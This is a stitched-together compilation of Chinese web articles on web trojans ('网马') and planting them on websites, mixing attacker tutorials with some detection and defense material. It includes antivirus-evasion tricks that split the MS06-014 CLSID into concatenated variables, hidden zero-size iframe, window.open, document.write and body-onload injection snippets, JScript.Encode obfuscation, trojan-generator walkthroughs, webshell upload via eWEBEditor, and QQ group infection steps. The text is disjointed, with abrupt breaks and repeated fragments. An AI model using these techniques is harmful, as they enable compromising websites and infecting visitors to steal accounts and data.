什么是网马,怎么制作网马,怎么挂马

一:首先认识网络上的各版本网马首先认识MS-06014 MS-06040 MS-06042那么，网络上的大部分最新的网马生成器，也就是利用这些漏洞来制作网马的其实，网马他很简单，我们从原理来学习他。

别看网络上的网马生成器，非常的多，其实，都是一个模式出来的。

就像QQ木马一样，都是一个源代码弄出来的二:认识网马代码那么，8月份的MS-06014漏洞现在网络上的大部分稳定的网马生成器，也就是延用这个漏洞。

他的网马生成器所生成的原装网马代码的是最早的占有者等。

这里，我们查看MS06014 中华网络所生成的网马这个就是原装的代码，那么，我们通过比对，就能知道，网络上的这些个天花乱坠的网马生成器原形三:通过对比，我们来学习，如何来制作免杀的网马首先，我们查看和对比，最新的免杀网马所生成的网马与原装代码不同之处通过学习，了解，这些其貌不一的网马到底是如何各自不同的制作各自的免杀（我们主要学习，最新的MS-06014网马，因为现在网络上大部分稳定的网马生成器都是由他变异而来）四:举列子首先，我们查看MS-06014 代码中可以用来制作免杀的变量"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36""object""classid""Microsoft.XMLHTTP""GET""s cripting.FileSystemObject""Shell.Application"首先，我们拿"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 举列然后到，免杀网马中，找到经过免杀处理后的这一句，我们就能知道，大家是如何通过变形这句代码达到免杀的列一：蓝防收费版变异代码j1="clsid:"j2="BD96C556-"j3="65A3-"j4="11D0-"j5="983A-"j6="00C04FC29E36"j7=j1&j2&j3&j4&j5&j6然后在网马代码中的"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 里面的clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 替换成j7也就是"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"="j7"具体我们可以查看最新的蓝防免杀网马列二：老丁内部网马变异代码U1="c"Bs="l"Bg="s"UN="i"Io="d"Ul=":"Y3="BD"Os="96"I2="C5"I8="56-"J3="65"ob="A3-"P4="11"sy="D0-"Q5="98"U0="3A-"E6="00C"Ug="04F"Xn="C29"Ij="E36"M7=u1&Bs&Bg&un&io&ul&Y3&Os&i2&i8&j3&ob&p4&sy&q5&u0&e6&Ug&xn&Ij变异的无所谓不短哈~还是一样，经过这样变异后"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"="j7"列三：NCPH变异代码c1 ="clsid:BD"c2="96C556-65A3-11"c3="D0-983A-00C04F"c4="C29E36"大家看到这句，HOHO~他并没有在尾部升明a1=b1&b2....这样的形式，他的变异是缺少了吗？其实他不升明，只需要在原装代码中的"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"替换成"c1+c2+c3+c4"--------------------------------------------------------------------------------------------------------------------------------------二实践操作变异"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"拥有属于自己的个性免杀如果你仔细的看了上面的列子，结合你的思考，通过你的学习你应该懂得呢，如何去变异这些代码，如果我们学会，以后不管什么漏洞，不管什么代码，原理掌握了，我们顺手就能免杀那么我呢，就举列变异一次弄个简单的，@-@首先在代码中升明，恩，告诉系统，我们已经把某某代码，替换成某某代码了，别读写错误拉`也就是"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"zhonghua1="clsid"zhonghua2="BD96C556"zhonghua3="-65A3"zhonghua4="-11D0"zhonghua5="-983A"zhonghua6="-"zhonghua7="00C04FC29E36"zhonghuahk1=zhonghua1&zhonghua2&zhonghua3&zhonghua4&zhonghua5&zhonghua6&zhong hua7貌似分离爱猫扑.爱生活，~-~HOHO，把机器人的手脚分开，等你检查我不是机器人后，偶再组合起来好拉，不多举列拉，再举教程就太大拉~-`三:生成属于自己的免杀网马这里，我们来招卑鄙的在别人网马变异过后的基础上，我替换掉一句，然后，生成~HOHO~~这样，完美的属于自己的网马就不小心弄好拉~这里我们使用蓝防收费版免杀网马使用MS-06014漏洞变异网马（这网马人家可是说提高中率百分之五十哦，不用白不用）然后用zhonghua1="clsid"zhonghua2="BD96C556"zhonghua3="-65A3"zhonghua4="-11D0"zhonghua5="-983A"zhonghua6="-"zhonghua7="00C04FC29E36"zhonghuahk1=zhonghua1&zhonghua2&zhonghua3&zhonghua4&zhonghua5&zhonghua6&zhong hua7替换掉m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"接着在将下面的M3换成zhonghuahk1（@-@:可以悄悄的说，知道了原理，免杀还真是简单)然后确定，唉呀呀~~弄成拉~那么希望大家参照上面的变异，别学我偷懒，弄他个超级无敌变异免杀网马出来~。

终极网站挂马检测工具(网站被挂马怎么办)之前做一些淘客站，一些小站，也都没有在意过检查网站挂马！总觉得应该没有人会给我的网站挂马，现在做了一些正规站，一些商城，所有的东西都要考虑了。

一不小心网站被挂马，我那些数据可就麻烦大了啊，还有网站的排名恐怕也难保了。

所以今天就收集了一些资料，全部整理了一下，然后给自己的网站都运用上了。

具体网站被挂马怎么办大家可以看我下面的介绍！一，网站被挂马有什么危害？1，网站被搜索引擎（google，百度等）屏蔽，影响SEO流量。

2，网站被杀软查杀或屏蔽。

3，网站成为木马散布点。

4，严重危害用户各种账号安全，影响自身公众信誉度。

5，网站的数据受到影响。

6，网站本身操作SEO的话，会对网站权重受到影响。

二，网站被挂马在搜索引擎和浏览器中被拦截的情况：百度搜索后网站被挂马情况：谷歌搜索后网站被挂马情况360浏览器网站挂马检测情况火狐浏览器网站挂马检测情况Googel浏览器网站挂马检测情况三，如何判断网站被挂马，网站被攻击？如果检查你的网站时候存在下列问题，则说明你的网站可能已经被黑客攻击：1、通过Site语法查询站点，显示搜索引擎收录了大量非本站应有的页面。

2、从百度搜索结果中点击站点的页面，跳转到了其他站点。

3、站点内容在搜索结果中被提示存在风险。

4、从搜索引擎带来的流量短时间内异常暴增。

注：site查询结合一些常见的色情、游戏、境外博彩类关键字，可帮助站长更快的找到异常页面，例如“site: 博彩”一旦发现上述异常，我们建议您立即对网站进行排查。

包括：1、分析系统和服务器日志，检查自己站点的页面数量、用户访问流量等是否有异常波动，是否存在异常访问或操作日志；2、检查网站文件是否有不正常的修改，尤其是首页等重点页面；3、网站页面是否引用了未知站点的资源（图片、JS等），是否被放置了异常链接；4、检查网站是否有不正常增加的文件或目录；5、检查网站目录中是否有非管理员打包的网站源码、未知txt文件等。

挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码（通常是通过IFrame、Script引用来实现），当用户访问该网页时，嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件（如Flash、PDF插件等）漏洞，在用户不知情的情况下下载并执行恶意木马。

挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL，比如下面的挂马代码：<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0，使得嵌入的网马URL在网页上不可见。

<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。

通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。

除了这两种常见的挂马方式外，还有如下几种：1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。

2、利用网页跳转、弹出新窗口等方式进行挂马。

3、利用Flash等媒体封装的方式进行挂马。

4、在CSS（层叠样式表）里可以执行JavaScript的浏览器中进行挂马。

挂马常见类型常见的几种类型如下：1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中，如果网站页面使用到这些字段的值，并且没做适当的过滤，就有可能导致用户访问该网站的页面时执行攻击者注入的代码。

2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。

3、ARP挂马在与目标站点同一局域网的情况下，攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗，并将挂马代码注入到用户请求的响应页面上，从而达到隐蔽的挂马目的。

∙∙当前位置 : 主页 > 网络安全 > 黑客教程 >网页挂马详细步骤教程来源：互联网作者：佚名时间：04-30 13:19:33【大中小】点评：其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。

下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单的了，只要你懂点html语言把下面这段代码插进网页中：其实很简单的的，说到原理，就一个：就是在人家网站的主页那里插入一个自己的网马的页面，等有漏洞的人查看了人家网站的主页，那么他就成了你的肉鸡了。

下面我介绍5种方法，我一个一个介绍方法一：这个就是最简单的了，只要你懂点html语言把下面这段代码插进网页中：<iframe src="这里换成你的网马的地址" width="0" height="0"frameborder="0"></iframe>我来插入，理论上来说插到任何地方都行，只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样，不知道网易那里有没有弹出的广告了，好我们运行，注意到网页的左下角的网址变化看到左下角了吧，那里在请求，说明我们插入进去的页面也运行了，哦，还有个弹出的窗口，给我的工具拦了，我来刷新一次，看到吧width="0" height="0" frameborder="0"就是大小高度的意思，我们把他设置为零，那我们就不能看到网页的内容了看下一种方法，把原来插进去的清理掉先，等下那个文件还要用方法二：这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做网页的时候就会加入很多网页特效，同样我们也可以用来打开我们的网马，那么浏览过机子就会中我们的网马了～学过java的都知道上面一段代码的意思了把！打开网站的同时也就打开了我们的/test.htm看我们插进去弹出的窗口给拦了，我去掉先，还是给拦了晕，有个窗口弹了出来，这样子的网马是不保险的……不过也不失为一种方法呃～改成0就更大的窗口了，好，方法而已，只是介绍，下一个方法三：还有一点就是比较隐蔽的那就是使用js文件document.write("<iframe width='0' height='0'src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0'src='/mm2.htm'></iframe>");我们没必要挂两个网马，就写一个好了额刚才写错位置了保存为mm.js，然后在首页里调用js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调用的代码，从这里我们可以看到/mm.js，说明我们的mm.js 文件可以不传到主机上，这样可以方便我们批量管理我们挂马，传到我们的主页空间上就可以了不过我这里就不传了，就用本地的吧，运行左下角……调用了163的了，再刷新下，看清楚点，OK下一种方法方法五：再一种代码就是调用其他网页的页面文件,可以将下面的代码复制，保存为HTM文件。

---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一，在 2008 年到2010 年间，网页挂马攻击更是成为了黑客最主要的攻击手段。

根据瑞星云安全系统监测， 2008 年到 2010 年间，客户端受到恶意网马的年攻击次数达到千万级别。

虽然近两年来，网络钓鱼攻击已经在数量上超越了网页挂马攻击，但是网页挂马攻击所带来的危害依然巨大，不仅对网站的安全运行造成威胁，对客户端用户来说，网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。

常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后，在网站的页面中插入一些代码，当浏览者访问到这些包含有恶意代码的网页时，就会在不知不觉中执行相应的漏洞利用程序。

这些程序可以在浏览者的电脑上下载并执行木马程序，导致浏览者的电脑成为黑客的肉鸡。

挂马操作可以有多种方式实现，以下是比较常见的几种挂马攻击手段。

1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架，在访问网页时，从网页表面是无法通过肉眼看到这个框架的，只能通过网页源码分析或抓包的方式查看到相应的数据信息。

1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中，同时恶意篡改网站文件中的 JS 文件代。

一般来讲，那些被全站引用的 JS 代码最容易被黑客挂马。

3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理，黑客通过加密代码的方式隐藏了该信息。

4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的，当用户访问挂有以上代码的网页时，页面就会自动跳转去执行黑客指定的恶意页面，从而导致挂在恶意页面的木马在本地被执行。

网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件，如果网站存在SQL注入漏洞，则比较容易取得一定的权限。

如果在服务器上对网站目录等做了较严格的权限限制，也是比较容易取得Webshell权限，具有Webshell权限可以对网页文件进行修改，而挂马就是在网页中加入一些代码。

这些代码往往是利用浏览器或者应用程序的漏洞，浏览者在访问这些网页时，往往会在不知不觉中去下载一些木马程序来执行。

网站挂马的原理就是设置框架网页的宽度和高度为0，将一些恶意网页隐藏起来，用户访问网站时不容易觉察。

目前在网络上有很多网页木马生成器，简称“网马生成器”，本案例以“Ms-0733网马生成器”为例，来讲解如何进行网站挂马攻击。

步骤一配置网页木马。

在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端，然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”，如图1所示，然后单击“生成木马”即可生成一网页文件HACKLL.HTM。

配置Ms-0733网马生成器步骤二修改网站网页文件。

在网站首页文件index.asp中加入已经配置好的网页木马htm文件，一般通过在页面中加入“”来实现，如图2所示。

加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞，其网页木马最本质的东西有两个一个是脚本，另外一个是真正的木马服务端，利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。

其网页木马文件中多是一些JavaScript代码，如图3所示。

网页木马源代码测试网页木马是否能够正常执行。

在未安装微软的MS0933补丁程序的虚拟机中打开浏览器，并在其中输入网页木马的地址，一会儿后，在控制端就看见肉鸡上线了。

大量传播网页木马。

网页木马测试成功以后，就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上，只要访问者的系统未安装其网页木马利用的漏洞，如果系统未安装任何对网页木马进行防御的软件，则计算机感染网页木马的几率非常大。

网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上，“网页挂马”是一个出现频率很高的词汇。

关于某些网站被挂马导致大量浏览用户受到攻击，甚至造成财产损失的新闻屡见不鲜。

而这些挂马事件总能和一些软件漏洞联系起来。

那么，什么是网页挂马？网页挂马和软件漏洞有什么联系？它的危害在什么地方，又该如何防御呢？本文结合攻防研究中的经验体会，将就这些问题进行探讨。

网页挂马简介什么是网页挂马要解释什么是网页挂马，要先从木马说起。

大家知道，木马是一类恶意程序，和其它的正常文件一样存在于计算机系统中。

这些恶意程序一旦运行，会连接到远处的控制端，使其享有恶意程序所在系统的大部分操作权限，例如给计算机增删密码，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等各种有害操作，而这些操作往往不被使用者察觉。

将木马与网页结合起来成为网页木马，表面看似正常的网页，当浏览者浏览该网页的同时也运行了木马程序。

网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞，自动下载已经放置在远端的恶意程序。

由于下载过程利用了软件上的漏洞，是非正常途径，不会被计算机系统或浏览器本身所察觉。

网页挂马指的是攻击者篡改了正常的网页，向网页中插入一段代码，当用户浏览网页的同时执行这段代码，将引导用户去浏览放置好的网页木马。

使用一些特别的技术可以使得这段代码的执行对用户来说不可见。

网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞，只要这些漏洞能够被利用并执行任意代码，那么存在漏洞的系统就有可能受到网页木马攻击。

网页挂马的技术门槛并不高，互联网上可以得到很多现成的攻击工具。

同时网页木马隐蔽性高，挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行，用户都无法察觉。

网页挂马的传播范围同被挂马网页的数量和浏览量成正比。

各种类型的网站都可以成为网页挂马的对象。

上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。

网站挂马及检测技术网站挂马与检测技术报告什么是挂马？所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。

利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。

也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。

当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。

网站挂马的危害危害和应用的普及程度有关，上网人人都会，也就是说，人人都可能中毒。

据金山毒霸安全实验室统计，每天有数百万次浏览与挂马网页有关，中毒概率在20%-50%之间。

很多游戏网站被挂马，黑客目的就是盗取浏览该网站玩家的游戏账号，而那些大型网站被挂马，则是为了搜集大量的肉鸡。

网站被挂马不仅会让自己的网站失去信誉，丢失大量客户，也会让我们这些普通用户陷入黑客设下的陷阱，沦为黑客的肉鸡。

如果不小心进入了已被挂马的网站，则会感染木马病毒，以致丢失大量的宝贵文件资料和账号密码，其危害极大。

挂马泛滥的原因利。

病毒木马黑色产业链有丰厚的利润，去年南京警方抓获的大小姐系列木马案，犯罪集团3个月获得非常收益3000万。

网络应用越普及，黑色产业链的从业者收益也就越高。

挂马范围哪些网站容易被挂马呢？越是流量高的网站对黑客越有吸引力，黑客攻破一个管理上有漏洞并且网站流量很高的网站，一天就可以感染数百万人。

那些与公共事业密切相关的网站，比如政府机关的网站，色情网站，视频网站，聊天交友网站，提供盗版软件破解工具的网站最容易被入侵，几乎每周出现的热点网络事件都被攻击者利用，网民一不小心就会受热门事件吸引中招。

这段代码就显得更加隐蔽，因为几乎95%的网页中都会出现类似的script 标签。

利用js引入网页木马也有多种方法：在js中直接写出框架网页木马示例代码如下：document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>")；指定language的属性为"JScript.Encode"还可以引入其他扩展名的js代码，这样就更加具有迷惑性，示例代码如下：<SCRIPT language="JScript.Encode" src=http://www. /mm.jpg></script>；利用js更改body的innerHTML属性，引入网页木马如果对内容进行编码的话，不但能绕过杀毒软件的检测，而且增加了解密的难度，示例代码如下：op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E'；利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下：<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menu bar=no,scrollbars=no,width=1,height=1"); </script>；利用URL欺骗示例代码如下：a href="(/迷惑用户的链接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的正常内容</a>：<SCRIPT Language="JavaScript">function www_163_com (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location =no,directories=no,status=no,menubar=no, scrollbars=no,resizable=no,copyhistory=ye s,width=800,height=600,left=10,top=10"); }</SCRIPT>3.body挂马使用如下代码，就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。

2，挂马的技巧挂马首先要求的是隐蔽性，这样挂的时间才能长。

像在SWF、JS、RM中挂马就是比较隐蔽了，但是还可再用到些技巧。

(1)远程任意后缀执行HTML可以把horse.html改成horse.jpg之类的后缀，然后语句写成<iframesrc=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。

js也可以，语句为<script src=/uploadfile/200902/20090220105353594.jpg></script>，甚至js的不要后缀名都可以。

(2)JS的加密为了保护网页木马的代码，可以把JS内容加密，还能躲开杀软的作用。

如果使用ENCODE加密方式，加密后的JS调用语句就用<scriptlanguage="jscript".encode"src=/horse.txt></script>。

除此方法外，还有其它更多的方法！(3)URL的变形URL的变形方法也有很多，例如将url的16进制转换为encod编码等。

如果是涉及到URL欺骗的方法就更多了，不过多数的URL欺骗，像利用@的技巧，IE都已经打补丁了。

但现在有个漏洞仍然有效，代码如下：<a id="CZY" href=""></a><div><a href="" target="_blank"><table><caption><a href="" target="_blank"><label for="CZY"><u style="cursor: pointer: color: blue">Google</u></label></a></caption></table></a></div>保存该代码为网页后，鼠标移动到Google这个链接上时，IE状态栏显示的是，但点击链接后却打开网站。

数据库插马默认数据库下载漏洞，是许多黑客喜欢利用的一种技术。

管理人员可以特意为网站留下这个“漏洞”，让黑客下载指定的数据库，殊不知他们也就慢慢走入了陷阱。

1、数据库下载漏洞利用原理默认数据库下载、上传、后台密码绕过等漏洞虽然很初级，但却有不少恶意攻击者通过此点攻入网站。

一旦侥幸成功后，其后果不言而喻。

于是网站管理人员可以修改网站真正的数据库的名称，改变其路径来实现保护目的，并且将伪装插入木马的数据库不做更改删除，等待入侵者下载中招。

2、数据库插入木马首先，准备一个远程控制工具(比如，远程控制任我行)，进行简单的配置生成服务端。

然后运行“office系列挂马工具全套”工具包中的“MdbExp.All.v1.04.exe”，指定要运行的木马程序，设置木马保存路径，点击“确定”，就把这个服务端程序伪装成MDB格式的数据库文件。

(特别提示：服务端不能超过50KB。

)3、设置陷阱以动网DVBBS论坛为例，网站管理人员修改原有数据库的名称并改变其路径。

将插入远控服务端的数据库改名为“dvbb7.mdb”，放置在动网的数据库默认目录下。

攻击者尝试利用数据库下载漏洞进行网站攻击时，就会下载伪装的插入远控服务端的数据库文件，当其双击打开“数据库”时，被嵌入其中的远控服务端自动运行，入侵者的电脑也就被网站管理人员控制了。

管理后台挂马攻击者通常非法登录网站的管理页面，然后上传木马，进一步渗透、提权，甚至控制服务器。

对于这样的入侵，网站的管理人员除了要加固服务器的设置之外，也可以在管理后台中设置陷阱，请君入瓮。

1、攻击原理恶意攻击者在非法获得了网站的管理员用户名和密码后，就会进入网站的管理页面尝试进入后台。

对于这样的恶性行为，网站的管理人员可以通过在登录页面文件中加入代码，运行指定的程序，而惩罚攻击者。

2、制作网页木马后台陷阱第一步：运行MS-07004网马，生成一个木马客户端，将该程序上传至网站的某个目录，得到一个URL地址。

为什么要网站挂马如今电脑病毒的种类越来越多了，那么你们知道网站为什么挂马吗?下面是店铺整理的一些关于网站挂马的相关资料，供你参考。

什么叫网站挂马?网站挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马，再上到空间里面!再加代码使得木马在打开网页时运行!作为网站挂马的散布者，其目的是将木马下载到用户本地，并进一步执行，当木马获得执行之后，就意味着会有更多的木马被下载，进一步被执行，进入一个恶性的循环，从而使用户的电脑遭到攻击和控制。

为达到目的首先要将木马下载到本地。

1.将木马伪装为页面元素。

木马则会被浏览器自动下载到本地。

2.利用脚本运行的漏洞下载木马3.利用脚本运行的漏洞释放隐含在网页脚本中的木马4.将木马伪装为缺失的组件，或和缺失的组件捆绑在一起(例如：flash播放插件)。

这样既达到了下载的目的，下载的组件又会被浏览器自动执行。

5.通过脚本运行调用某些com组件，利用其漏洞下载木马。

6.在渲染页面内容的过程中利用格式溢出释放木马(例如：ani格式溢出漏洞)7.在渲染页面内容的过程中利用格式溢出下载木马(例如：flash9.0.115的播放漏洞)网站挂马背景通过对近期网内检测到的623个被挂马网站所使用的Web服务程序类型以及编写网页所使用的脚本语言类型进行的统计分析：图脚本语言及服务程序类型分布统计从图中可以看出，被挂马网站使用最为广泛的是IIS服务，其次是Apche服务。

容易被挂马的多数是ASP编写的网页，而直接使用HTML的静态页面则相对安全。

是什么导致了IIS+ASP的服务组合容易被挂马?这需要从造成网站被挂马的原因说起。

网站挂马的产生原因1. 网站服务器的系统或应用程序存在安全漏洞导致网页被挂马所有的系统和应用软件都可能存在漏洞，各厂商会针对自己的产品定期发布安全公告和补丁程序，如果管理员疏于管理，不及时的安装补丁，就可能导致漏洞被攻击者利用从而篡改网页进行挂马。

Windows系统和Linux系统一样都会存在漏洞，但是由于Windows 系统的普及率及版本的通用性使得攻击者更热衷于去开发Windows底下的攻击程序，这就导致运行在Windows下的IIS+ASP的搭配更易受到攻击。

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

挂马常用方式1. 什么是挂马？挂马是指黑客利用各种手段将恶意软件或恶意代码植入到合法网站或应用程序中，使用户在访问这些网站或使用这些应用程序时，受到恶意软件的攻击。

挂马的目的通常是窃取用户的个人信息、登录凭证、银行卡信息等敏感数据，或者利用受感染的机器进行网络攻击、传播病毒等。

2. 挂马常用方式2.1 SQL注入SQL注入是指黑客通过在应用程序的输入框中插入恶意的SQL代码，从而获取数据库中的数据或者执行非法操作。

黑客可以通过注入恶意代码，将恶意软件植入到网站的数据库中，使得用户在访问网站时被感染。

2.2 文件上传漏洞文件上传漏洞是指应用程序在处理用户上传的文件时，没有对文件进行充分的验证和过滤，导致黑客可以上传包含恶意代码的文件，并将其保存在服务器上。

当其他用户访问包含恶意文件的页面时，恶意代码会被执行，从而实现挂马的目的。

2.3 XSS攻击XSS（Cross-Site Scripting）攻击是指黑客通过在网页中插入恶意的脚本代码，使得用户在浏览网页时受到攻击。

黑客可以利用XSS漏洞，将恶意代码植入到合法网站中，当其他用户访问被植入恶意代码的网页时，恶意代码会被执行，从而实现挂马的目的。

2.4 漏洞利用黑客经常会利用已知的软件漏洞来进行挂马攻击。

他们会寻找应用程序或操作系统中的安全漏洞，并利用这些漏洞来植入恶意代码。

因此，及时更新软件和操作系统，修补已知的漏洞是防止挂马攻击的重要措施之一。

2.5 木马程序木马程序是一种隐藏在合法程序中的恶意代码，它可以在用户不知情的情况下运行，并与黑客的控制服务器进行通信。

黑客可以通过木马程序远程控制受感染的计算机，并进行各种恶意操作，包括挂马攻击。

3. 防御挂马攻击的措施3.1 安全编码开发人员应该遵循安全编码的最佳实践，包括输入验证、输出过滤、参数化查询等，以减少挂马攻击的可能性。

应用程序应该对用户输入进行充分的验证和过滤，确保只接受符合规范的数据，并对输出进行适当的过滤，防止恶意代码的注入。

黑客攻防：网页挂马攻防全接触网页挂马是攻击者惯用的入侵手段，其影响极其恶劣。

不仅让站点管理者蒙羞，而且殃及池鱼使站点的浏览者遭殃。

不管是站点维护者还是个人用户，掌握、了解一定的网页挂马及其防御技术是非常必要的。

1、关于网页挂马网页挂马就是攻击者通过在正常的页面中（通常是网站的主页）插入一段代码。

浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。

2、获取Webshell攻击者要进行网页挂马，必须要获取对站点文件的修改权限，而获取该站点Webshell是最普遍的做法。

其实可供攻击者实施的攻击手段比较多，比如注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞都可被利用。

下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。

1）.网站入侵分析eWEBEditor是一个在线的HTML编辑器，很多网站都集成这个编辑器，以方便发布信息。

低版本的eWEBEditor在线HTML编辑器，存在者上传漏洞，黑客利用这点得到WEBSHELL（网页管理权限）后，修改了网站，进行了挂马操作。

其原理是：eWEBEditor的默认管理员页面没有更改，而且默认的用户名和密码都没有更改。

攻击者登陆eWEBEditor后，添加一种新的样式类型，然后设置上传文件的类型，加入asp文件类型，就可以上传一个网页木马了。

（图1）2）.判断分析网页漏洞（1）.攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp？id="语句，只要类似的语句存在，就能判断网站确实使用了WEB编辑器。

（2）.eWEBEditor编辑器可能被黑客利用的安全漏洞：a.管理员未对数据库的路径和名称进行修改，导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。

b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆。

QQ挂马方法揭密导读:有无数上网用户每天都在使用QQ，大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式，却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险，远比QQ尾巴病毒、QQ传木马之类的隐蔽得多，危害更加大。

今天我们就来看看攻击者是如何在QQ群和QQ空间中..有无数上网用户每天都在使用QQ，大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式，却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险，远比QQ尾巴病毒、QQ传木马之类的隐蔽得多，危害更加大。

今天我们就来看看攻击者是如何在QQ群和QQ空间中挂上网页木马，攻击浏日期览用户的！一、QQ群中简简单单挂木马在一个比较火的QQ群里挂上网页木马，一定很容易得到许多肉鸡的。

怎么在QQ群里挂马，是在群里面群发木马的网址吗?现在已经不会有人上这样的当了。

我们要作的只是在群里面发一个作了手脚的帖子。

步骤一：制作网页木马在攻击前，我们首先要制作好一个木马网页。

这里笔者使用了“上兴远程控制木马V2006”，这个木马功能非常强，以前笔者曾作过介绍。

用上兴生成木马服务端程序“muma.exe”后，将服务端上传到某个网站上去，假设地址为“/muma.exe”。

打开“南域剑盟网页木马生成器”，在中间的“URL”处填入木马的链接地址，点击“生成”按钮，将会在生成器当前目录下生成一个名为“script.txt”的文件(如图1)。

